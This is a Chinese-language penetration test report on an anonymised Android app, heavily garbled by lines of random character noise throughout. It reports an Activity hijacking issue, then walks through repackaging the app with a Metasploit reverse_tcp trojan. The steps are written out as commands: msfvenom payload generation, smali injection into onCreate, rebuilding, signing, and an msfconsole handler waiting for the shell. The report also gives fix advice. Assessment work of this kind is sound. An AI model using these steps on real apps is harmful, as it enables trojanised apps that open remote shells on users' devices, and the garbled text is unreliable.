2 C2 G/ K+ U% V1 ]$ R" D4 C
* Y: A% C+ e# b0 s3 a% f; ?! S% ]
1 z' ]+ C: q( h% K% `0 r
+ D. Z9 h9 M' a8 P% |9 ]$ M 1 G, A4 C+ D% z
$ j& s8 Q4 j, }$ b- o9 k& n
7 T8 k e$ n+ @1 t
/ M" D% n4 Q* h0 Z# g% a
( H! U+ Y0 [! `. e" x3 Z( C" c
- a4 g9 K" [, a/ I 2 检测结果
& l/ c+ n9 n6 o' C! g# A7 J
; J O9 B Z) g- U0 u5 P* q
" V: y3 ]9 Y* F, a4 A
3 J D j1 L6 n& ]. k" i
" _$ ^! j$ {1 y) U) Y+ O! k3 q, L7 r
3 l$ W! ]) g4 @# B. d 2.1 某某某
d6 \5 d/ @" E9 r5 {0 [0 j5 A* ? z) D8 _( M+ N+ ^# n
9 I! }8 H. U4 @
& a' W# t: }1 o' A
+ k0 y" R& Q3 S, {9 N- t
- c7 |: y2 E0 \: }5 s' z
2.1.1检测目标
* I2 m) |0 B( ^. g; @- T% H) r! a9 g6 _+ P9 z# H3 D O
: f! H3 |/ p; o! a0 k0 J) Q
) ^& i4 V5 ?; }4 T; M5 q- l 5 {& f6 J. q- ?3 l v6 ?# l
) X/ E$ x U% w/ G0 v 目标地址: 某某某某某某APP
A7 ]3 z- ~5 ?( s/ c. E
4 D Z$ w$ V3 T9 s: a; l3 X$ `
# J$ ?6 n$ [& z- w/ S
' Z# Z5 ] }& Q/ d) w6 F+ i + V; A! x( z9 Q* q1 g4 L" G
& f! l0 t9 u* ?: I0 e
2.1.2检测结果 # `% N4 x! [. ~" {7 S3 I. L8 `
. r2 r1 R, S7 g
# c) d. M+ S7 g3 n5 F( P. ]" c% M: y T
1 L" P- E0 j) d# v* Z' V
: p7 W0 v( m. x& c! L8 Y
5 M- G0 w2 D2 t/ W& Y9 m 2.1.2.1
+ E* f3 q$ I, }% M4 r) Y% m" g' {. E
- t3 f9 T, F5 m
0 I+ [ H" L$ ^9 [( U" V8 }
9 G. e" u7 w8 C4 Q5 u$ w6 N
; w# t \9 {- h$ o m( G6 k6 k; w
2 \0 L' R/ O7 m, k9 }; H0 G 漏洞链接地址:某某某某某某APP
1 G, i4 |, L; i6 ~! P2 H2 E) L
r% v5 R' X1 k: e! u( O: U v* ~
- l/ e/ V9 j* ^2 Z
6 I$ ^/ K' ]( I' i 6 i* P& a% n+ n' |9 y
; l7 o* O* Y7 N( K& _% y
7 x! W7 N+ G: Q2 H6 _! n, P7 d4 c7 _) o+ G: P
: T% C6 T0 L* w
. ?2 M$ S. l& | \9 y- s0 f' r 1 Q! i% Z# @' I5 A
0 {5 \ U7 Z2 T6 N; Y9 z y 漏洞分析及取证: 2 y4 |3 @ K. F C2 r
/ K! Q- I; P! b& k6 W) W
2 {" R7 I. G2 ~: B O$ X
: n2 a! d" k/ W- @- K: n0 y' P8 R F
. Y9 y3 x$ q% a: E# k o6 L
4 y# X& k) C1 _7 G 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: : {1 M9 b& z* n% ^
1 V& d* c' `6 X" z5 n# i
/ x, G% u. s, w: ]/ @- x; }2 U
( B1 @! k/ X& a$ |( i' S, O; P0 [ 4 O, j5 v$ W: f" Y
( O: S" X+ R4 n 6 @4 c9 `& X! }3 S, J/ c4 o; f* C
% m. |3 M3 {( ]8 X) q- y8 n
; f5 |( o' y+ Q3 t0 h) D5 s/ u) ?
3 T% z; l+ |4 W& D) V* ?5 O
1 y! H- w4 m9 K! f9 V) P8 Q% o* ?
1 S8 F% A4 r" N3 {! I
3 ^1 w- f# ^1 ^+ I6 W
3 H9 t! m& R |! P/ F) K+ [
1 }( Q; T0 f* Y7 I: x) V8 b4 h
+ }9 j% L% I5 X) \! d! j0 I# @
4 Y! W) Q H* u1 A$ ~
8 Z7 r" M& _3 H + a" M& e. ]" b
( L0 f" ]& S& u0 R
% M, l& L9 [, G' Y* {" A3 A6 a
5 \" Z9 m, z6 V9 N9 d
- _% P5 a' W, ^/ K: W
. x6 ^# z/ {5 B9 m& w1 l* g; r : U% f+ X+ E |$ R" r9 j
0 t, [* y# D/ |
; \7 |0 S# |$ h7 q/ J$ V- @& y% [9 v A7 ]) ^& _( q
& B: x: O" c+ Z0 t
- J* |+ f0 D9 i' G
. }* y* M2 Z* y2 l5 {: J# q* B7 `5 N5 q; T& P
2 g% \3 y) P: Z- t7 j! o2 k
5 H$ B6 ^0 ^# M
8 T' I& V! i7 |- C9 `4 }2 z2 L8 E
漏洞危害:高 : F* X; Z9 \ I
; ]4 l2 d) X. h/ s
) d; o4 H' ^: H0 E" M: Z3 S( F4 d! F7 G
& A# w) b' R: S$ h+ L* ?+ e; z! {" r' Y8 b5 {6 e' ]9 u `
# H8 h4 i6 f+ j7 J6 X9 q) o9 W3 s; s1 Y% j, l# h8 ^1 N
0 d; X; \$ a& {- o" p) S
: ] N# O/ w: T1 l8 r* Y" [ D0 [/ Z6 b/ I6 F; M
. I# t! Z; x0 ]. ^+ r8 x- p
$ ?7 e' G# x* P M. G
( K! h5 j+ J( y0 C 7 @; \5 z' r: }9 O4 f) N
$ Q/ c/ Z2 u( S3 J+ @" a/ Q4 o
严重程度
" V4 i) [: r0 z }0 p/ g: i" d3 f8 Y! [& g) P) h6 {. J
6 Q3 C, t% b9 a; r0 S; T
. ]3 {& @% }9 o- z4 ~$ N! P
| 5 I7 f/ A" L$ e8 @# [- \: [
! ~$ p$ J* [" h4 S4 X
) |7 P$ b) c( M. D: @& `
- r: l* T8 V* l* p, I' w 0 C) W4 V1 X6 r1 G; \- B
% ~, @+ i2 m2 H2 u
高 : m8 n9 M( m% \5 d+ G* J h% y+ j
9 ? t0 c3 e3 p/ {! g
+ i; }5 s3 B" \7 ]% K& [/ p6 U) u. D. ^: s! s9 Y3 M
|
- K& m. P0 n; g1 j; M/ t5 Y+ S" t) `+ W( r8 y% c8 L% c/ h$ C8 n
7 ~8 d* |, \" P/ ?# |% W9 q( G: ?. t1 s2 u3 ~
; v$ e% w% d# u3 g& i" h4 y0 p
" n( d. A q1 ^6 x: {
■ ( c# z# r* R6 x) z7 y
2 l* A; p2 z0 r& e4 Z: {0 V
, h# `) |% i7 g+ X5 y0 y6 V1 n4 c1 G
|
! K8 q, D" |/ {, U2 j' R* ~
9 c- u. s. [+ d6 J" o% v( ?
6 L2 [. |- @+ A, x
0 x& O7 C' b; s; ^; }0 G
0 ]# p- `: O/ ~8 r) M) H
6 C6 B# |; @! W( X. f0 i$ v9 B 中 - N' k* t, o; V8 {
% C1 D. g7 q3 [- G6 N: |$ a0 d % t; d" s( z& l2 z
+ h4 q$ O0 S5 {1 f/ n% J3 w
| - x8 v% K0 k( e. P$ P* u5 `7 ~8 u2 s
4 l5 w9 `- Q* @/ D' @+ v6 X
2 U! J, d2 I4 S& o, w& z% t5 G2 }/ i& d U6 S" N' X
3 m# ~, R1 G# n8 b; ~: s7 S+ i. g
P3 P! C' A7 D, {5 y) e ) N6 h" X0 d( I2 l/ ]
9 {0 j& [! q P! l L+ m. H' V B 4 D9 f) B2 c7 Y
# m$ K& ~ J: _9 c; R | h' `$ g1 F3 ]" g1 p5 F
& A7 Y0 |) L0 S2 C4 y, f
: G, r2 B( m0 y9 \, X
4 ^6 f% E+ {, O
; r: o8 d7 }2 y3 F
0 N% l8 Y8 @! B, H: k 低
% {! j5 P4 V% H1 w
7 p! w9 b# y# T4 R. U + y+ d5 P, F% ?" X
% v# X6 N E4 Y: B |
# Q9 F( X! B3 J8 C* O4 e: P8 N3 V4 K) d
- }$ q1 |" G: L- [ w
3 q+ A" `: x4 K1 S& n4 t
% c, ?/ x! \. Z3 c* W! o1 X, w# R- I$ ^, q
& g0 L" T" i- m
3 c+ z7 k; g" W! ~2 I& R
4 m4 U) ]* A5 l, M/ b5 i) i2 `! x. b4 r4 _) K- d8 B9 y
| 2 W2 x- n+ b/ C: E5 q
( L3 O) p& d5 }- ]9 X
) g; X- P' N n, H$ `. g) q8 m* f( j/ E) Y
/ G! j: \9 e" U9 r/ K
! E8 V5 a. T8 Q9 M
- _3 D7 u( I- b
6 ~( G+ L. Q J' h6 I/ P
- T# |2 L# l% }/ N: X
: x' D1 S2 Z1 G
" N" Y- _& m# j! z# c7 J+ b8 k
8 O, j2 t: ^' d0 t5 s4 g6 ^ 7 u+ z$ Y k9 J2 h
$ ?6 A4 v+ `/ v' V' o
- C2 _& X8 m; X9 K
- u! D( H, k. p2 s& c* Y
& I; l, M' J/ z% R3 |. x+ l- R8 T7 Z' Y$ Q2 Q
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 4 }/ A1 g @$ M/ B7 F
4 b# h( D5 O3 B# Y% q- P
- n* b- ]0 Y) Y' }8 z; i
+ `$ u: l+ V; v6 j4 `
8 j" x0 u, H5 Y# y0 F& E
p, u1 q5 c% B" `5 ~
4 C4 J2 R7 J: v
t5 h+ r8 _0 y: z% X8 n
$ C! V( M- e5 G$ s4 [0 s6 [. }& T, ^' I9 e8 o1 b% G; \
0 @5 I- S4 S( {! ], r. a' B6 A. ]* T+ g6 S: T2 z8 k
6 M3 {/ l: Q! ]2 w* t
6 Z2 C2 t% ]) ~; N% o
# V* N: s0 L+ w
S4 t) X U- C' N( t0 b6 @+ I
$ Q$ a# R! _4 V) f5 W4 w q. X0 t1 R6 h/ L2 J: W9 w/ y
2.1.2.2
! ]; d; H4 i, |& y: V
* t* X8 Y+ V: y, q+ y7 f
& m% g; _0 Z2 q8 Z: `0 v- ]
+ |/ W r5 T( h8 [
- f4 t4 S4 G, Z- P) G3 ]2 z6 d" C; |8 @# i- l8 i- J+ D- T
漏洞链接地址:某某某某某某APP 3 j. E' E* c5 j% ]. H2 c" M
_8 J I6 v' O/ P8 }
, b2 x: H! m9 \
1 o6 v* H# o3 E; e, z; b
& T% Y4 Y+ o. k' L
4 f* ?- M! p0 {$ w% d2 n 漏洞分析及取证: . R/ O% w& I( s- k7 @
0 W. ?4 S) d$ J8 Z
. V0 }1 b6 Q, z( I# j, k; h
* q7 J# V: a" x* t5 `; `* f3 | N : U" u: x% o5 @( w; H* x3 e
7 ^* o/ i9 m# r0 [8 U2 L3 r2 G
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
" M" ?- F/ [: A- L# L E5 y R8 E+ o2 m0 Z
/ ~6 m; ]& s8 M# U9 |/ k* l/ }% A. I! y
5 i+ d3 T0 i: i" U
. M9 X, }' F" I. _0 c- t' W' w, I
用Metasploit 生成木马 apk
# o* O4 ?5 B* k& H4 n1 R+ v/ M; S
& t( w1 V. \$ @( x' B- c( d
9 R6 P2 k/ G( B1 T; [$ O9 x' Y5 c: z) D, c f3 |; I X
6 o2 \1 v( D+ @# m% O. i- { i6 q. e+ k
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
( l+ q e, ~$ m1 x1 t
. K n" W" {. p" L, d; ?5 Y
. X3 q, ^, n: w# M6 W
2 b3 N# m. |. y
( @0 M' w v$ q/ O: g0 ]
l% C+ Q: J% L6 b9 g 反编译目标apk和木马apk
0 C* G$ P) u# E0 f: I5 D: Z7 T0 p9 g Z7 z/ U' M) b4 v
& s- u0 h# e( A; C" S
! T" ~! p1 V2 y% s6 k+ ^* z & x, J, ]+ ?; b! Y
* w6 `, X& w: G8 O$ N% o
apktool d target.apk
- Q/ } @7 L/ o m
7 y o3 Z/ \+ _+ m
apktool d cockhorse.apk - G6 x8 I; S% I
* b2 C" m/ |! j# z
! h& A# w" N) u1 I5 U$ x3 o* I
- \& S' c. h, Q3 X ) ]1 S7 P6 c$ S) ?4 y
+ A, K2 Q* _* M# k2 G* k
木马 apk 注入目标 apk 3 c1 b* z5 z) f! @: \" b
8 V3 o( @7 n( r0 o
. b" K1 U4 n4 u( R' N! p! a; f" K
5 V, b. O* j& f6 q# R 8 ? R$ H* D4 c; V6 b* N" B( R
1 ~& y% t) H4 l6 Z" @9 K' e- l; Z& U 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
6 }, P6 F/ Z( w4 D0 E! D
; M* _! z4 B7 P* B- C+ y& \- h$ @ invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V " ? G+ E M: B! e: _) x
: Y" Z4 m* `9 ]! V
6 @8 @& e' N1 u, ]) s+ u
6 V4 }# _5 O5 T
2 A A( N$ p+ X* f# d" }! j9 E/ q# Q. {3 M d9 H2 s
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 ' s7 h' I0 a3 y0 U
3 U5 k2 g) S# B
, S2 I5 z, W0 T% j8 V- f7 M2 R# v* V
( L& Y3 x$ L4 D 9 i" R9 r; r% P
/ d! E: B# Z# s
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
7 H( `$ v, V! c3 @2 v' |2 ?0 C, _( Y' A8 Q% l
7 `: n- d8 Z) x/ l p1 n! o+ y
6 R) L- N! d0 M* {
/ \6 @' Y: N+ O& e; W: U9 A
. g* P; E, P. o" W$ j 回编译生成最终 apk
+ r' S" t$ U. [) u5 @: }- I0 ^
& c2 s& Y( d! i8 [/ q
' Q: O' }2 E9 Z' P1 H7 W, l& O, M
$ b9 G/ o7 D w. a3 I / }% O8 V% J& \
4 `; q2 q# o$ ~2 u0 S2 k: p 重新打包 . g$ V9 k' F4 z6 B& B; Q! q2 Y. @
8 Z$ U+ K2 D( B. j+ B8 Y
' g# U+ y2 }5 k) t; i* I
4 G( z& j1 K8 c9 M7 _ U; S7 H: h; a* h
6 X ?. c' V0 }! Z apktool b -o repackage.apk target_app_floder
2 Y5 Q' A. L- t: X! J. T0 B- p a& w0 ?1 r9 Q4 e# ^
" f1 I( G" c- u# O) B2 G+ ^: h3 T% a8 {% k+ }0 D
; ^) [! E' N R8 e4 V1 W
9 J, K0 M6 V* p/ C ]. c" S7 ? 创建签名文件,有的话可忽略此步骤
1 P8 \4 S3 k. W0 N- C$ N3 q" X$ k7 I! [* K/ \+ X. c& k# D
* q. P. K+ D$ w% S
0 W+ \; b. g, \/ A0 A. r
( R. B3 t( o% K, K1 O2 v- ?, j' Y" s4 v/ h2 s: D! x& f
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 4 \: C# Q% z2 H% S, R: G& L8 @, q
* {3 N' O- \' g0 G8 ]" C
$ Y8 h6 Z1 v7 g2 ~1 k1 ~
5 B; g+ p H/ d8 Z; Q6 i2 P7 O( m1 z 3 ~" Q, y! j$ J
; d0 Y; f6 U5 W8 n; s" v
签名,以下任选其一 - f4 n% A; g6 J" U5 U) ]6 \
0 w9 o! u0 s6 e0 m( u
: ], ?- X2 u A- |7 r3 y4 D. R3 b5 \7 u9 Z
( ?0 g3 o0 ^& k! t( }$ s/ {4 T/ f" i7 S8 j' c3 ?8 V. m
jarsigner 方式 6 \5 F, y' Y4 n" i$ ]
# s# o2 [' t; g; t
) U B+ q: g# j7 g# m
3 s. W1 {. o7 e3 }1 I. y % k+ U U8 w/ ~. l
7 b' X2 h. f4 E
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 6 g$ ^: y) v. ~
9 y7 p; E0 t1 ~& c$ S: v$ N
& b7 X" k& E" I- c' S4 X
6 _3 d* X3 b! h) L
8 K7 c, P; O5 C6 n" p( ^- w& r) C t4 L/ h0 m
apksigner 方式 3 p1 @* E1 I$ L) q' Z
9 m7 Z( B" L- P( M( s2 g9 p" I. r
! E1 k" a* n: }6 w4 u$ H
; o; k- g8 W1 Y2 v' D4 E/ L
" c7 Y* n: c* Y% M% x! a
" h/ t$ v; w$ j+ R/ E$ b$ X) ~' \7 ^ apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
9 u$ Q- L# S% g% T( N5 @. y) S
- |2 i+ U5 H- C$ h- f' J( y
' u% q" F h" b" D$ p* ]4 Z
" y5 X9 m3 E, w
; k2 B) H5 R5 a0 K! u
! B: n; c$ n4 B( Y 如需要禁用 v2签名 添加选项--v2-signing-enabled false ) j% b8 I0 ?! d* ^
3 V+ {, {( b9 P- o
6 w y& u6 @$ z1 f0 P9 v
& B3 N& y- Z( @7 B4 m
8 O) ]' C4 {( p7 h' b% l/ `
' k( N# C! U/ q 验证,以下任选其一
% Z% s8 B& A% C3 y
$ v) N- r) X6 \
0 @+ s- X! ^" u! ~* r& [ k& o! }! i: |' T: R
5 r* t6 J. \- a; K% j
- U0 t1 u* R' @% i' k* n
jarsigner方式
& m+ I: R4 e+ n, X' p) m, B5 X. C8 @8 N) T" a+ F
. d5 r7 z+ x a; N; w1 `/ j9 R& v. B4 s% u9 t. p2 m
" q; |, U9 Q+ q2 y' n$ w' o/ Q
. \! `3 X/ X0 I) ]. M6 t2 t& v1 Q0 _, i5 y jarsigner -verify repackaged.apk 8 k/ I2 @' J. I, Q; w
& b/ _" @/ J/ M# Q/ g
$ R4 k- ?! p; L' q# C9 q. O
" q7 M, d' t: [: U! o
* L9 `& m5 b1 O/ o( Y" g! l" S- r9 \+ H, T* Q! e2 P, O7 H* z
apksigner 方式
5 r! x7 U" O/ T2 Z/ ^5 ?
u% F9 C- P6 B( h% e/ z" X K( J
0 U+ m+ B; D ~! i( M+ E P! L! L2 K0 m& Y) d8 `/ G) F/ J
/ A( |9 G v& `1 O w
+ v! q: E$ `" [ apksigner verify -v --print-certs repackaged.apk
) i8 Z ~; W+ a& e
% ^7 B+ i4 \) a; |2 @
$ P0 ] V6 Q3 _, j% C+ w6 K8 {
: z$ y1 g+ I; u
5 O% M1 T' P# B: V, n
' |4 b" E6 Y4 H keytool方式
; D3 r& c2 B! y! @
7 ?" T: P3 Z- f; m2 x% a% B; q
7 t; D, v8 P+ V3 }! Q
+ R5 h1 c4 R2 E3 Z
) I, b, ^- k0 l; [# e; [2 s( s7 D/ A& ], b* I/ ]
keytool -printcert -jarfile repackaged.apk
' E6 [4 k6 ]6 t' _
+ w" o7 C- r4 [% ?' F
( c6 ~* f3 U! s+ J O4 L
1 ^" o: R& r) ]* B j
# Y# t( [& I v, A, \8 F% C! C( g7 s4 v* v1 K) N
对齐
' h- s$ L- c. B5 Y8 ?* y) q1 R$ `1 [# O# k# m' e0 U
) {8 e; K& r/ w- I: _% m
8 N! O' P6 E& C' [/ f* s7 | Z
! o6 r0 x6 ?7 w& j: n; F- n! S; c
# Z* F( I+ ~# A4 g 字节对齐优化
2 O# S7 y+ U# n& f+ B3 L
0 d. S9 _! ~2 P( V
2 h; N* B" J# E2 ~/ S' z$ e4 t0 b* H x- Z9 r& y( `, R1 H; P( A" o
3 O( z* {1 P- S( |7 M) v
: T' V1 m6 w2 D: e0 @, n zipalign -v 4 repackaged.apk final.apk
, X8 n. W. h! L) T1 R) v; Z+ L- [ p, @5 O# ?
0 W) O1 A( n/ H* n+ a3 e' [( I, g& V$ H7 d/ \
! V7 S/ \5 L$ [: W$ `3 b; i4 P; O2 t8 `: o2 L0 x, j
检查是否对齐
9 t7 f0 _& o7 j1 Q& N" c' G3 n& w, }" h2 E/ e
$ M2 g6 P1 u+ e
; \% R0 h0 o, q7 g4 `4 j
9 R& G5 U/ J& F6 H4 X2 @( v6 c
; v/ R: F$ G8 D8 ?) G; l) t& q zipalign -c -v 4 final.apk
8 t3 o2 F( h+ ~( j/ S4 h5 U+ [( j& y# j9 x# z
. z7 U. t% b4 W9 l# ^6 W
7 q% ]8 U6 G2 W! o& q5 |7 q5 \ $ U# ] }( Z! [# K0 l7 I
& ]. I( V; t5 l1 q3 n5 J! G
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 # \! ], l. b5 C
1 @ l, W" I( p9 X2 b
1 s& @9 f r. ]# ]4 S1 H( D. M* t8 m2 z' [6 h
- S1 K4 @3 [' C% K+ Y* y
) {! z( Q/ r$ v4 j 启动Metasploit控制台,配置参数等待上线
5 d3 ^0 h5 e: A1 `
0 V% T3 |5 T" n2 K4 [8 e$ T
4 t. M: k! V% `
+ \6 T) q' W) P X2 a0 H ' g. Y5 [, B' } [2 u, _
% d! {8 K- ~+ z+ r! {, [" R
在终端依次输入如下命令
A1 e* C" d# {3 T
6 F+ s9 q4 J7 {; n: i7 U3 e
' ]( D4 C H! T+ p1 ~
* }6 ~0 Z' R: b( s( h
0 ? g& K* o, J8 x# p7 r ~' |6 _" m0 _5 X
msfconsole
9 t9 q9 x# w' o6 A# e7 T5 d( k, d3 q' r8 n, F& w0 W; M
% G, b1 `5 I( i
* A( _: j/ Z0 a+ h8 k8 ]
' b6 { s* D: A) Z- E
/ F0 M: k' I* Y- O; ]4 h use exploit/multi/handler + k# } E7 l& b3 f
$ k# L2 K: h3 h: p
/ ^1 w" K3 y8 X% W$ _3 O* B8 O$ \; y9 ~' E
c* ~/ Q7 h; f* g+ ?& `# U0 x9 d" H- T0 k
set PAYLOAD android/meterpreter/reverse_tcp
7 j; l- r E+ C# ^. e
% }4 h9 Z5 P" `- j. Q& ?6 c
* m! X5 l. ?6 P: T
2 o% Z$ D( N3 o9 W. T( i
9 O8 C- p% V3 F8 U0 H
$ E ` `/ N+ ]4 ` set LHOST 192.xxx.xx.xx , Y$ o: Y2 _0 l$ J2 `, n, B
' A) I* l0 H) o) x
0 v( ]' H) }, q, q1 N
' e) c( L S0 g" f% Y, O6 D6 K
7 K7 \% m$ ~/ ^8 p4 M* ?9 V& g2 C. b" w$ `) R
set LPORT 4444 3 z' _* W; g9 J( m
6 d4 O/ c7 V, z) ~0 K) i
* Y5 J% s6 ?* m4 Z; A$ F" |+ G" `9 P* W& m: N" F( s2 x' m7 S
' l3 ^1 d9 y' x$ j3 ^0 `9 o" F4 i& f4 B
exploit
# ]& R+ o2 |, e; N& S
d3 Y/ l* C1 r
5 l$ M2 e7 Z( B# ~, [ q. P8 V7 ~4 P; ^3 {' a; U% d
2 o# N& U9 y; y# O6 }2 t
& B" ]6 m" L$ s/ [" s% ~ 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
$ B A9 ?7 z* Q% }) U4 v# ]
% ?+ [- e) n+ G7 R: Z
4 T. M1 M* M& u! y9 H8 b
+ i7 J% E# X+ k6 H
- e5 n- m' X, X; G) d& C! h) v& b8 }1 f: I7 r4 H, j9 e
漏洞危害:中
% D. f; Y" z1 y% o3 w5 f# L- K) Y. A* B/ k; G7 c0 E
9 [* n% R( F, J$ \. i2 P
" Z* v. Q: j- `8 D+ a' M , ?! d# u3 _; f& h
5 o7 s9 C: V4 L8 T
. g8 Y+ l2 y7 J/ L) L1 W
& `' v" w! s/ b+ v2 z J# K
! X* w# I8 c6 t0 S% C" r
: @3 W/ J5 N: b7 ]3 N! F! r % T1 k5 F2 R5 b5 j! w1 O
1 P$ f- V( V# g
4 o7 T( _0 W! q, y S0 @4 p5 D2 O
N, d/ \. A2 P0 x
9 l! \% W, l0 M6 ?1 b
; \9 |4 A. e/ Z. {+ d2 d: D1 S: ^2 | L/ l3 X
严重程度 3 y& C- q4 }6 }3 i
. U5 f( ^$ V; D: X1 ?! W
% M- H; w& Q; D! q% i h W a
$ S& b0 J6 i$ E8 O: J) C |
' X- c( s& k8 `- A% w# F+ C( x6 J5 G
^' ?- L. y: ^) L* q8 h% w7 X& k/ }5 i# P1 @
. \7 N X" n, B' A) L) Z3 r" [) y/ V M
p: I& z; ^. @ ] L
高 9 ]" \: f- S7 q# C0 f3 J# g1 m
9 p9 @/ e6 N2 x' d( S+ o5 M 5 M, h1 \* ]% L- ?. Y( X
8 M& b8 w, ^1 I5 b$ U
| & s; \8 j( z8 N; I6 y
( O4 N7 B, r, B$ a9 Q% }3 v 1 F9 b: N5 M2 I% T
5 K j0 s2 ~" [
. ]. X" M( k. x. U% x/ q( I) C6 F) |* _2 y: l c9 P
■ 6 [$ r- j& S/ R6 w, I: U$ I
$ G2 c; h) L; g* ^# }; l
9 ] _; g7 {2 G5 {
: v) ]2 Z. K& l% E5 Z | : v5 p4 R4 O. f: k
) o: d& |6 @: k5 g6 D- y' f$ y
' }' c$ G' e) L6 s( o9 I
! R" L+ u \ D+ Y1 P5 ^8 B
% c$ o% a5 u: n9 S
V' y% a1 a6 Y+ V 中 ) @. f6 j' g* U8 y" D8 f3 W( B
! N6 M& R/ U8 u
, H) ?4 k G2 c& S8 @
& l% [5 p8 i/ i* O8 {: b
| 6 x( R" N" Y! t4 a
7 T, }% c6 J& J6 |" v& @
, j9 G' P& A1 {! \4 {& q [- k7 A8 X6 _. K/ u* c+ ]/ `* O
0 B5 |( i$ q2 o: A
, W. u, H# u. U/ `7 N N4 N
! U8 y2 `! p- i& |
6 S+ K8 y) B. Q& O
. ^2 m4 o" d5 M% g9 q8 ^' [; W( Y
! s5 A5 }* G: B4 S
}. X8 H; b# q7 h N
|
$ l- Z; H+ f3 e/ [/ d6 |5 b' |' @0 p0 S+ T7 B
: A; g, ^; W* A" `. h7 `0 s
5 M5 f/ H8 V, k
$ E# c6 ^$ c/ j* h5 Y6 V
( N% L w+ c9 }7 M" Q& \ 低
* w& G, T8 Z/ P s Y* b
* k$ p& ~1 d2 p3 n+ H; S5 e+ H, l: r2 S 8 y( G. v/ g% i7 I
$ }2 p! P# ]) J- D4 G( S( k5 t4 T
|
: ~6 ]$ j, Q2 c6 K; M |. x7 q' q1 O; U i& P
# o' X, N) L, r' l/ s6 B& R
" c1 |# Y F# A. A Z - y7 ?+ w& f5 U7 @8 C+ d
+ I8 @% R. x$ x
* B" E/ X- n4 p8 c; d. r8 I' L1 c) _, d
$ w, C @$ c0 J" D& m5 W
9 b8 V" m, X1 y9 S/ u# }9 o6 t2 _
4 } Y! M) M) S% a" e$ Y/ c3 J" d! f0 \ D; F4 n
|
; v Y0 u! r, a) ?. K" d" w9 Q# P* X0 r6 _: i" O$ n
9 ]( l" s" c" |) q2 a2 N9 R8 U6 U8 z; v# x! A G( Y2 E- h
" x3 {8 X- T& ~1 ]* l& A) W; H3 B
2 t" o3 ?( m/ V/ E3 \8 A5 ]
2 S3 F9 Y: T! x$ a, _
$ K5 N" b. \) C6 t6 w5 R9 E: ?/ {& Z) ^ 4 w' S, i' d# g: v
0 F) E- S) e( \4 z3 f8 N P. U0 z5 t7 e g/ ?+ ?
- u7 I6 m) z8 s. `1 n# E
9 Z0 E: i9 z" }% k4 n0 J
+ G, R9 W7 }, U# u3 [9 J
% f% o* A' c" b7 C
- H6 m- O+ g8 |4 f4 K4 B& v . Y8 k4 i% A6 N: [& g! L" ]
8 K8 l/ R% [1 S) [
修复方法: 9 I0 A* e+ A& Y2 W( j# [& f/ l
$ S( t( ]% R) |) ~" Z, b$ S0 Z
1 d# {! X$ c% O! v9 h. C, i& {* l' H/ @+ S6 R
" d* \! C* n. ]7 O) [) H! W* U
0 e; w, k \6 D. m& J9 m
1.在 APP 启动时应做签名校验防止二次打包。
K% r8 R; \& C4 O8 j
) G/ J6 N& l1 ?
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
9 G5 T# K$ n) T/ G, L1 I$ @ K4 y& e6 W: M+ s1 ~' R$ ^
: F. B9 H5 L8 i5 P: {
! U# L$ g1 U6 i; b; o1 w( w' z
. d/ r" R% i, f' h
/ V0 v2 c6 |1 V% L8 F8 v
9 w7 T7 }! G3 A O, I; o. H2 Y; V, z- l8 h
2 |. e) U7 { p; Y) z
! y. [. j" {" q2 q
7 q% o5 F0 w3 @& X! x
0 c& r' M8 c6 g7 C- Y) J+ g ' w m. A* T7 G
& d. ^1 p, r$ q+ V r
6 g `+ v) D0 Q9 J
, F* F$ K( \. U. k9 J+ N
$ H" `& o# N' Y9 b( k' S* L
' H# J. a( I% ?) u3 u* Y8 o
0 z+ ?# n8 s/ q
7 F1 I3 \5 I. r* J' T